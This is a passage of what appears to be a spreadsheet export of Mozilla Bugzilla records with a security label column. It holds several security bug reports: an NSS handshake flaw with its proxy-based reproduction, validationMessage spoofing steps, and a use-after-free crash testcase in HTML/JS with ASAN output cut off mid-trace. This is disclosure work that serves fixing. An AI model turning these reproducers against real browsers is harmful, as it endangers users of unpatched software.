  * frame #0: 0x0000000100712244 js`JS_GetClass(JSObject*) [inlined] JSObject::getClass(this=0x0000000104685200) const at jsobj.h:128
    frame #1: 0x0000000100712244 js`JS_GetClass(JSObject*) [inlined] JSObject::getJSClass(this=0x0000000104685200) const at jsobj.h:131
    frame #2: 0x0000000100712244 js`JS_GetClass(obj=0x0000000104685200) + 4 at jsapi.cpp:1769
    frame #3: 0x000000010002f16e js`js::ctypes::CType::IsSizeDefined(JSObject*) [inlined] js::ctypes::CType::IsCType(obj=0x0000000104685200) + 5 at CTypes.cpp:3480
    frame #4: 0x000000010002f169 js`js::ctypes::CType::IsSizeDefined(obj=0x0000000104685200) + 9 at CTypes.cpp:3609
    frame #5: 0x0000000100032ef7 js`js::ctypes::ImplicitConvert(cx=0x0000000103088180, val=&lt;unavailable&gt;, targetType_=&lt;unavailable&gt;, buffer=0x0000000103031198, isArgument=false, freePointer=0x0000000000000000) + 87 at CTypes.cpp:2293
    frame #6: 0x000000010003fe5a js`js::ctypes::CType::ConstructData(JSContext*, unsigned int, JS::Value*) + 260 at CTypes.cpp:5177
    frame #7: 0x000000010003fd56 js`js::ctypes::CType::ConstructData(cx=0x0000000103088180, argc=2, vp=0x00000001048090b8) + 758 at CTypes.cpp:3249
    frame #8: 0x00000001002531ba js`js::CallJSNativeConstructor(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) [inlined] js::CallJSNative(native=0x000000010003fa60)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) + 160 at jscntxtinlines.h:235
    frame #9: 0x000000010025311a js`js::CallJSNativeConstructor(cx=0x0000000103088180, native=0x000000010003fa60, args=0x00007fff5fbfeb60)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) + 106 at jscntxtinlines.h:268
    frame #10: 0x000000010022c330 js`js::InvokeConstructor(cx=0x0000000103088180, args=CallArgs at 0x00007fff5fbfeb60) + 160 at Interpreter.cpp:821
    frame #11: 0x00000001002222e8 js`Interpret(cx=0x0000000103088180, state=0x00007fff5fbff278) + 45864 at Interpreter.cpp:2953
    frame #12: 0x0000000100216f8f js`js::RunScript(cx=0x0000000103088180, state=0x00007fff5fbff278) + 335 at Interpreter.cpp:677
    frame #13: 0x000000010022d017 js`js::ExecuteKernel(cx=0x0000000103088180, script=&lt;unavailable&gt;, scopeChainArg=0x00000001046742e0, thisv=0x00007fff5fbff388, type=EXECUTE_GLOBAL, evalInFrame=&lt;unavailable&gt;, result=&lt;unavailable&gt;) + 1383 at Interpreter.cpp:902
    frame #14: 0x000000010022d36f js`js::Execute(cx=0x0000000103088180, script=&lt;unavailable&gt;, scopeChainArg=&lt;unavailable&gt;, rval=0x0000000000000000) + 431 at Interpreter.cpp:941
    frame #15: 0x000000010071a549 js`ExecuteScript(cx=0x0000000103088180, obj=&lt;unavailable&gt;, scriptArg=&lt;unavailable&gt;, rval=0x0000000000000000) + 505 at jsapi.cpp:4133
    frame #16: 0x0000000100007f9a js`Process(JSContext*, char const*, bool) [inlined] RunFile(JSContext*, char const*, __sFILE*, bool) + 464 at js.cpp:467
    frame #17: 0x0000000100007dca js`Process(cx=0x0000000103088180, filename=&lt;unavailable&gt;, forceTTY=&lt;unavailable&gt;) + 1866 at js.cpp:597
    frame #18: 0x0000000100004f9b js`main + 64 at js.cpp:5789
    frame #19: 0x0000000100004f5b js`main [inlined] Shell(JSContext*, js::cli::OptionParser*, char**) + 348 at js.cpp:6055
    frame #20: 0x0000000100004dff js`main(argc=&lt;unavailable&gt;, argv=&lt;unavailable&gt;, envp=&lt;unavailable&gt;) + 15951 at js.cpp:6376
    frame #21: 0x0000000100000fa4 js`start + 52
I guess this is same bug as following, in bug 891107 comment #28:
https://treeherder.mozilla.org/logviewer.html#?job_id=9001639&amp;repo=mozilla-inbound</t>
        </is>
      </c>
      <c r="X63" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="64">
      <c r="A64" t="n">
        <v>1086145</v>
      </c>
      <c r="B64" t="inlineStr">
        <is>
          <t>2014-10-21 00:28:53 -0700</t>
        </is>
      </c>
      <c r="C64" t="inlineStr">
        <is>
          <t>NSS incorrectly permits skipping of ServerKeyExchange</t>
        </is>
      </c>
      <c r="D64" t="inlineStr">
        <is>
          <t>2015-07-06 12:13:57 -0700</t>
        </is>
      </c>
      <c r="E64" t="n">
        <v>1</v>
      </c>
      <c r="F64" t="n">
        <v>1</v>
      </c>
      <c r="G64" t="n">
        <v>3</v>
      </c>
      <c r="H64" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I64" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J64" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K64" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L64" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M64" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N64" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O64" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P64" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr38.1+][adv-esr31.8+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q64" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R64" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S64" t="inlineStr">
        <is>
          <t>3.19</t>
        </is>
      </c>
      <c r="T64" t="n">
        <v>1</v>
      </c>
      <c r="U64" t="n">
        <v>0</v>
      </c>
      <c r="V64" t="n">
        <v>87</v>
      </c>
      <c r="W64" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36
Steps to reproduce:
We have been performing systematic state machine tests on NSS, OpenSSL, and other SSL implementations, and we found some unexpected behaviours in NSS (not all are immediately exploitable.) We will report the other weirdnesses in due course, but here's one that seems to break False Start's forward secrecy guarantee.
The core issue is that the NSS client allows an ECDHE_ECDSA exchange where the server does not send its ServerKeyExchange message. In this case, NSS will take
the (long-term) EC key from the ECDSA certificate, and use that instead of the
server's ephemeral parameters. This violates the TLS protocol and also has some security implications for forward secrecy.
The application at the client (e.g. the browser) still thinks it is engaged in an ECDHE exchange, but in fact it has been silently downgraded to a non-forward secret mixed-ECDH exchange. Consequently, if False Start is enabled, the client will start sending data encrypted under the (non forward-secret) connection keys. This breaks some of the changes of Bug942729 (https://bugzilla.mozilla.org/show_bug.cgi?id=942729).
To test this behavior, we used Chrome or Firefox to connect to Gmail (which uses ECDHE-ECDSA) via a network proxy. We allow all messages to pass through, but block the ServerKeyExchange going from google to the browser. The browser still completes the handshake and starts sending data. 
The culprit is in the beginning of ssl3_SendClientKeyExchange in ssl3con.c:
if (ss-&gt;sec.peerKey == NULL) {
	serverKey = CERT_ExtractPublicKey(ss-&gt;sec.peerCert);
        .....
}
Expected results:
One would expect the client to kill the handshake when it receives the ServerHelloDone without having received a ServerKeyExchange in an ECDHE exchange.
A similar behavior occurs for DHE, but requires the server to send a DH-key certificate (which is much rarer in practice.)</t>
        </is>
      </c>
      <c r="X64" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="65">
      <c r="A65" t="n">
        <v>610527</v>
      </c>
      <c r="B65" t="inlineStr">
        <is>
          <t>2010-11-08 16:20:24 -0800</t>
        </is>
      </c>
      <c r="C65" t="inlineStr">
        <is>
          <t>Integrate WebTrends data into L10n and Contributor Dashboards</t>
        </is>
      </c>
      <c r="D65" t="inlineStr">
        <is>
          <t>2011-01-18 14:39:31 -0800</t>
        </is>
      </c>
      <c r="E65" t="n">
        <v>1</v>
      </c>
      <c r="F65" t="n">
        <v>1</v>
      </c>
      <c r="G65" t="n">
        <v>5</v>
      </c>
      <c r="H65" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I65" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J65" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K65" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L65" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M65" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N65" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O65" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P65" t="inlineStr">
        <is>
          <t>[push]</t>
        </is>
      </c>
      <c r="Q65" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R65" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S65" t="inlineStr">
        <is>
          <t>2.4.2</t>
        </is>
      </c>
      <c r="T65" t="n">
        <v>1</v>
      </c>
      <c r="U65" t="n">
        <v>0</v>
      </c>
      <c r="V65" t="n">
        <v>9</v>
      </c>
      <c r="W65" t="inlineStr">
        <is>
          <t>I already have the parsing of the JSON and its insertion into the DB working, after a fashion. All we have to do is join against the new document_visits table and order (and build all the UI that supports choosing sort orders).</t>
        </is>
      </c>
      <c r="X65" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="66">
      <c r="A66" t="n">
        <v>787818</v>
      </c>
      <c r="B66" t="inlineStr">
        <is>
          <t>2012-09-02 10:43:43 -0700</t>
        </is>
      </c>
      <c r="C66" t="inlineStr">
        <is>
          <t>crash in nsXULPopupManager::HidePopupCallback @ nsMenuPopupFrame::HidePopup with TestPilot</t>
        </is>
      </c>
      <c r="D66" t="inlineStr">
        <is>
          <t>2013-04-30 18:49:51 -0700</t>
        </is>
      </c>
      <c r="E66" t="n">
        <v>1</v>
      </c>
      <c r="F66" t="n">
        <v>1</v>
      </c>
      <c r="G66" t="n">
        <v>3</v>
      </c>
      <c r="H66" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I66" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J66" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K66" t="inlineStr">
        <is>
          <t>17 Branch</t>
        </is>
      </c>
      <c r="L66" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M66" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N66" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O66" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P66" t="inlineStr">
        <is>
          <t>[adv-main18+]</t>
        </is>
      </c>
      <c r="Q66" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R66" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S66" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T66" t="n">
        <v>1</v>
      </c>
      <c r="U66" t="n">
        <v>0</v>
      </c>
      <c r="V66" t="n">
        <v>81</v>
      </c>
      <c r="W66" t="inlineStr">
        <is>
          <t>It's a low volume crash in 15.0, but much higher in 17.0a2 where it's #14 top browser crasher.
Signature 	nsMenuPopupFrame::HidePopup(bool, nsPopupState) More Reports Search
UUID	c1acceb4-a6e9-444f-a5bb-f936b2120902
Date Processed	2012-09-02 17:20:07
Uptime	735
Install Age	1.3 hours since version was first installed.
Install Time	2012-09-02 16:04:00
Product	Firefox
Version	17.0a2
Build ID	20120901042009
Release Channel	aurora
OS	Windows NT
OS Version	5.1.2600 Dodatek Service Pack 3
Build Architecture	x86
Build Architecture Info	AuthenticAMD family 16 model 4 stepping 2
Crash Reason	EXCEPTION_ACCESS_VIOLATION_EXEC
Crash Address	0x616e616d
App Notes 	
AdapterVendorID: 0x1002, AdapterDeviceID: 0x9442, AdapterSubsysID: 040110b0, AdapterDriverVersion: 8.970.100.3000
D3D10 Layers? D3D10 Layers- D3D9 Layers? D3D9 Layers+ 
EMCheckCompatibility	True
Adapter Vendor ID	0x1002
Adapter Device ID	0x9442
Total Virtual Memory	2147352576
Available Virtual Memory	1833201664
System Memory Use Percentage	21
Available Page File	4861616128
Available Physical Memory	2730385408
Frame 	Module 	Signature 	Source
0 		@0x616e616d 	
1 	xul.dll 	nsMenuPopupFrame::HidePopup 	layout/xul/base/src/nsMenuPopupFrame.cpp:795
2 	xul.dll 	nsXULPopupManager::HidePopupCallback 	layout/xul/base/src/nsXULPopupManager.cpp:879
3 	xul.dll 	nsXULPopupManager::FirePopupHidingEvent 	layout/xul/base/src/nsXULPopupManager.cpp:1231
4 	xul.dll 	nsXULElement::AddRef 	content/xul/content/src/nsXULElement.cpp:312
5 	mozjs.dll 	JS_GetFrameFunctionObject 	js/src/jsdbgapi.cpp:597
6 	xul.dll 	nsPopupBoxObject::HidePopup 	layout/xul/base/src/nsPopupBoxObject.cpp:49
7 	xul.dll 	NS_InvokeByIndex_P 	xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp:70
8 	xul.dll 	XPCNativeMember::Resolve 	js/xpconnect/src/XPCWrappedNativeInfo.cpp:102
9 	xul.dll 	nsXPConnect::GetXPConnect 	js/xpconnect/src/nsXPConnect.cpp:139
10 	xul.dll 	XPCWrappedNative::GetAttribute 	js/xpconnect/src/xpcprivate.h:2822
11 	gkmedias.dll 	define_gf_group 	media/libvpx/vp8/encoder/firstpass.c:1800
More reports at:
https://crash-stats.mozilla.com/report/list?signature=nsMenuPopupFrame%3A%3AHidePopup%28bool%2C+nsPopupState%29</t>
        </is>
      </c>
      <c r="X66" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="67">
      <c r="A67" t="n">
        <v>1726621</v>
      </c>
      <c r="B67" t="inlineStr">
        <is>
          <t>2021-08-19 12:37:52 -0700</t>
        </is>
      </c>
      <c r="C67" t="inlineStr">
        <is>
          <t>Show form validationMessage on any website with window.open</t>
        </is>
      </c>
      <c r="D67" t="inlineStr">
        <is>
          <t>2024-05-30 10:35:53 -0700</t>
        </is>
      </c>
      <c r="E67" t="n">
        <v>1</v>
      </c>
      <c r="F67" t="n">
        <v>1</v>
      </c>
      <c r="G67" t="n">
        <v>3</v>
      </c>
      <c r="H67" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I67" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J67" t="inlineStr">
        <is>
          <t>UI Widgets</t>
        </is>
      </c>
      <c r="K67" t="inlineStr">
        <is>
          <t>Firefox 91</t>
        </is>
      </c>
      <c r="L67" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M67" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N67" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O67" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P67" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main93+][adv-esr91.2+]</t>
        </is>
      </c>
      <c r="Q67" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R67" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S67" t="inlineStr">
        <is>
          <t>94 Branch</t>
        </is>
      </c>
      <c r="T67" t="n">
        <v>1</v>
      </c>
      <c r="U67" t="n">
        <v>0</v>
      </c>
      <c r="V67" t="n">
        <v>26</v>
      </c>
      <c r="W67" t="inlineStr">
        <is>
          <t>Created attachment 9237103
formvalidity-windowopen.html
After call `reportValidity()` then open target URL with `window.open()` the [reportValidity validationMessage](https://developer.mozilla.org/en-US/docs/Web/API/HTMLSelectElement/setCustomValidity) will appear on the target website, it also looks to be called from the target website which is more convincing.
As the validationMessage appear on trusted website, users are more likely to trust to follow the message instructions.
Mozregression show it is regression of [Bug 1684792, open form validation popup anchored at screen coordinate as datetime picker and select do so that it is positioned correctly in out of process iframes](https://bugzilla.mozilla.org/show_bug.cgi?id=1684792) 
## Affected version:
- Firefox Nightly 93.0a1 (2021-08-19) (64-bit)
- Firefox 91.0.1 (64-bit)
## Unaffected version:
- Firefox ESR 78.13.0esr (64-bit)
## Steps to reproduce:
1. Visit attached formvalidity-windowopen.html
2. Click "Start Spoof validationMessage" button
3. validationMessage will appear on Twitter website
4. If you're logged in, then press Enter to like the tweet</t>
        </is>
      </c>
      <c r="X67" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="68">
      <c r="A68" t="n">
        <v>1450327</v>
      </c>
      <c r="B68" t="inlineStr">
        <is>
          <t>2018-03-30 11:49:14 -0700</t>
        </is>
      </c>
      <c r="C68" t="inlineStr">
        <is>
          <t>CSS and Javascript not functioning on reports-dev.tmo</t>
        </is>
      </c>
      <c r="D68" t="inlineStr">
        <is>
          <t>2018-04-05 09:50:53 -0700</t>
        </is>
      </c>
      <c r="E68" t="n">
        <v>1</v>
      </c>
      <c r="F68" t="n">
        <v>1</v>
      </c>
      <c r="G68" t="n">
        <v>2</v>
      </c>
      <c r="H68" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I68" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J68" t="inlineStr">
        <is>
          <t>Documentation and Knowledge Repo (RTMO)</t>
        </is>
      </c>
      <c r="K68" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L68" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M68" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N68" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O68" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P68" t="inlineStr"/>
      <c r="Q68" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R68" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S68" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T68" t="n">
        <v>1</v>
      </c>
      <c r="U68" t="n">
        <v>0</v>
      </c>
      <c r="V68" t="n">
        <v>4</v>
      </c>
      <c r="W68" t="inlineStr">
        <is>
          <t>We started adding reports to reports-dev.telemetry.mozilla.org. Take this report for example [1]. The CSS and Javascript fail to render. If I copy the site locally and open it, the full page renders. Looking at the javascript console, I see a bunch of Content Security Policy errors. 
Where is the Content Security Policy defined and can we loosen it?
Tagging :hwoo as assignee since he set up the initial deploy. Feel free to redirect.
[1] https://reports-dev.telemetry.mozilla.org/addons-engagement/index.html</t>
        </is>
      </c>
      <c r="X68" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="69">
      <c r="A69" t="n">
        <v>117297</v>
      </c>
      <c r="B69" t="inlineStr">
        <is>
          <t>2001-12-28 22:45:40 -0800</t>
        </is>
      </c>
      <c r="C69" t="inlineStr">
        <is>
          <t>Email address added twice in ADD CCs due to case-insensitive query</t>
        </is>
      </c>
      <c r="D69" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:27 -0800</t>
        </is>
      </c>
      <c r="E69" t="n">
        <v>1</v>
      </c>
      <c r="F69" t="n">
        <v>1</v>
      </c>
      <c r="G69" t="n">
        <v>4</v>
      </c>
      <c r="H69" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I69" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J69" t="inlineStr">
        <is>
          <t>Email Notifications</t>
        </is>
      </c>
      <c r="K69" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L69" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M69" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N69" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O69" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P69" t="inlineStr"/>
      <c r="Q69" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R69" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S69" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T69" t="n">
        <v>1</v>
      </c>
      <c r="U69" t="n">
        <v>0</v>
      </c>
      <c r="V69" t="n">
        <v>23</v>
      </c>
      <c r="W69" t="inlineStr">
        <is>
          <t>My bugzilla account is my email address with initial-capitalized.
when I input my email address in the Add CC field , it is all lower-case.
The result is the two addresses (actully one ) are all added in the CCs.
And  I get the notifications twice with the two address seperatly.</t>
        </is>
      </c>
      <c r="X69" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="70">
      <c r="A70" t="n">
        <v>1363396</v>
      </c>
      <c r="B70" t="inlineStr">
        <is>
          <t>2017-05-09 07:47:43 -0700</t>
        </is>
      </c>
      <c r="C70" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsDocViewerSelectionListener::NotifySelectionChanged</t>
        </is>
      </c>
      <c r="D70" t="inlineStr">
        <is>
          <t>2024-05-30 09:32:53 -0700</t>
        </is>
      </c>
      <c r="E70" t="n">
        <v>1</v>
      </c>
      <c r="F70" t="n">
        <v>1</v>
      </c>
      <c r="G70" t="n">
        <v>3</v>
      </c>
      <c r="H70" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I70" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J70" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K70" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L70" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M70" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N70" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O70" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P70" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q70" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R70" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S70" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T70" t="n">
        <v>1</v>
      </c>
      <c r="U70" t="n">
        <v>0</v>
      </c>
      <c r="V70" t="n">
        <v>10</v>
      </c>
      <c r="W70" t="inlineStr">
        <is>
          <t>Created attachment 8865875
crash.html (testcase, crashes firefox)
The following testcase crashes the latest ASAN build of Firefox (BuildID=20170509120348)
&lt;script&gt;	
function start() {
	o8=document.documentElement.querySelector('*:not([id])');
	o18=document.createElement('iframe');
	o8.remove();
	o29=document.createElement('iframe');
	o296=document.createElementNS('http://www.w3.org/2000/svg','feMergeNode');
	window.top.document.documentElement.appendChild(o296);
	o18.setAttribute('src','javascript:undefined;');
	o296.replaceWith(o18);
	o610=o18.contentWindow;
	o611=o610.document;
	o612=o611.documentElement;
	o612.innerHTML="&lt;textarea&gt;&lt;/textarea&gt;&lt;section contenteditable&gt;";
	window.top.document.documentElement.appendChild(o29);
	window.setTimeout(fun0, 4);
}
function fun0() {
	o971=o610.getSelection();
	o29.contentWindow.onresize=fun1;
	o29.width=1;
	o971.modify('move', 'right','lineboundary');
	location.reload();
}
function fun1() {
	document.documentElement.appendChild(o18);
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN output:
=================================================================
==12670==ERROR: AddressSanitizer: heap-use-after-free on address 0x612000077db0 at pc 0x7f538d68e6a3 bp 0x7ffca030da10 sp 0x7ffca030da08
READ of size 8 at 0x612000077db0 thread T0 (Web Content)
    #0 0x7f538d68e6a2 in operator bool /home/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:758:45
    #1 0x7f538d68e6a2 in GetDocumentSelection /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2637
    #2 0x7f538d68e6a2 in nsDocViewerSelectionListener::NotifySelectionChanged(nsIDOMDocument*, nsISelection*, short) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:3741
    #3 0x7f538d9a2a54 in mozilla::dom::Selection::NotifySelectionListeners() /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6489:28
    #4 0x7f538d99f6b4 in nsFrameSelection::NotifySelectionListeners(mozilla::SelectionType) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:2441:23
    #5 0x7f538d997208 in nsFrameSelection::TakeFocus(nsIContent*, unsigned int, unsigned int, mozilla::CaretAssociationHint, bool, bool) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:1891:10
    #6 0x7f538d99261b in nsFrameSelection::MoveCaret(nsDirection, bool, nsSelectionAmount, nsFrameSelection::CaretMovementStyle) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:1166:14
    #7 0x7f538d9bfa68 in mozilla::dom::Selection::Modify(nsAString const&amp;, nsAString const&amp;, nsAString const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/layout/generic/nsSelection.cpp:6665:24
    #8 0x7f538a44f7a9 in mozilla::dom::SelectionBinding::modify(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Selection*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/SelectionBinding.cpp:886:9
    #9 0x7f538b14f95e in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2954:13
    #10 0x7f5390944753 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #11 0x7f5390944753 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:470
    #12 0x7f5390945102 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #13 0x7f5391575cce in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:166:12
    #14 0x7f539152bef9 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #15 0x7f5391556443 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:479:21
    #16 0x7f5391558e17 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:739:12
    #17 0x7f5390944aa3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #18 0x7f5390944aa3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:452
    #19 0x7f539092d2ff in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:521:12
    #20 0x7f539092d2ff in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3025
    #21 0x7f5390913258 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:410:12
    #22 0x7f53909448d8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:488:15
    #23 0x7f5390945102 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:534:10
    #24 0x7f53912d718b in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2891:12
    #25 0x7f538acf5c25 in mozilla::dom::Function::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, nsTArray&lt;JS::Value&gt; const&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8
    #26 0x7f53894cc242 in Call&lt;nsCOMPtr&lt;nsISupports&gt; &gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:72:12
    #27 0x7f53894cc242 in nsGlobalWindow::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:13106
    #28 0x7f5389677ddb in mozilla::dom::TimeoutManager::RunTimeout(mozilla::dom::Timeout*) /home/worker/workspace/build/src/dom/base/TimeoutManager.cpp:720:42
